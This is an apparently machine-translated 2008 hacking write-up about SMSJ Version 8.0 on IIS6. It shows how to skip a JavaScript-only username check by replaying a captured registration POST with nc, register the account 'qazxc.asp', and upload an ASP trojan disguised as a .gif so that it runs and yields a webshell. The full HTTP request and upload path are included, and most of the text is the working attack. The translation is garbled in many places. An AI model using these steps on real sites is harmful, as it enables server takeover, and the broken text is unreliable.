The latest SMSJ Version 8.0 vulnerability-vulnerability warning-the black bar safety net

2008-03-27T00:00:00
ID MYHACK58:62200818630
Type myhack58
Reporter 佚名
Modified 2008-03-27T00:00:00

Description

Author:rover Help a friend testing the site's security, using SMSJ Version 8.0, known as the imitation of the Alibaba stuff, the registered enterprise members, login Manager, find the upload pictures will be categorized into one http://www. rover. com/UserDocument/your registered member account to/picture/directory not titillating, remembering the early move-that the registration vulnerability Speaking of this vulnerability is entirely iis6 caused, in iis6 the site, build a xx. asp folder, and then on the inside put one into a gif suffix of asp Trojan, still going by the asp to execute, look at the server, must be win2003,that is iis6 then I try to register the rover. asp users, register there to filter the special character, but see the next, just use a simple javascript to limit the The code is as follows:

function checkdata() { if( isNumberString(addform. user. value,"1234567890abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz_")!= 1 || addform. user. value. length<2 || addform. user. value. length>1 6) { alert("\user registration error, the following is generating an error. possible causes:\n\n·username must be 2-1 6 bit digital, English, or underscore") return false;ok,packet capture, and then use nc to submit, directly bypassing the

Capture content

POST /reg_save. asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

application/vnd. ms-powerpoint, application/msword, application/x-shockwave-flash, / Referer: http://www.rover.com/reg.asp?action=reg Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; . NET CLR 1.1.4322;

. NET CLR 2.0.50727) Host: www.rover.com Content-Length: 2 3 0 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDASQCACRB=FELPBKLAJDFPOKOPFBDEKGMB; cnzz02=1; rtime=0;

ltime=1 2 0 6 5 4 6 0 3 6 5 0 0; cnzz_eid=9 6 8 3 1 3 3 3-

user=qazxc. asp&pass=1 2 3 4 5 6 7&pass1=1 2 3 4 5 6 7&ypxxone_id=8&ypxxtwo_id=1 3 6&coname=rover&colxr=a

dmin&colxrsex=%CF%C8%C9%FA&addone_id=1 7&addtwo_id=4 9 0&coaddress=xxxxx&cotelq=0 1 0&cotel=3 8 4

7 6 5 6 4&mail=icerover@msn.com&vip=3&img. x=5 8&img. y=1 7

nc ip 8 0 successfully registered, then the asp Trojan into a gif suffix, when the image upload on the go http://www.rover.com/UserDocument/qazxc.asp/Picture/20080326.gif Since the Get webshell, over to the nearest lazy to speak, too lazy to retouch the writing, not read it have been skip skip... ps:the exploit is very simple, long time no write, purely hold back a word of it, laugh, in addition, you can also local submission of registration